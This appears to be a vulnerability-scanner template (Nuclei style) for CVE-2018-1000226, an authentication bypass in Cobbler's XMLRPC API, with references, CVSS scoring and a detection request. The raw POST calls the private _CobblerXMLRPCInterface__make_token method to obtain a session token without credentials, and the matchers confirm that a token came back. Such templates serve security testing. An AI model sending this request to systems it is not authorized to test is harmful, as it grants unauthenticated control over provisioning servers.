id: CVE-2018-1000226 info: name: Cobbler - Authentication Bypass author: c-sh0 severity: critical description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 tags: cve,cve2018,cobbler,auth-bypass metadata: max-request: 1 http: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml _CobblerXMLRPCInterface__make_token cobbler matchers-condition: and matchers: - type: status status: - 200 - type: word part: header words: - "Content-Type: text/xml" - type: word part: body words: - "" - type: dsl dsl: - "!contains(tolower(body), 'faultCode')" - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" # Enhanced by mp on 2022/05/12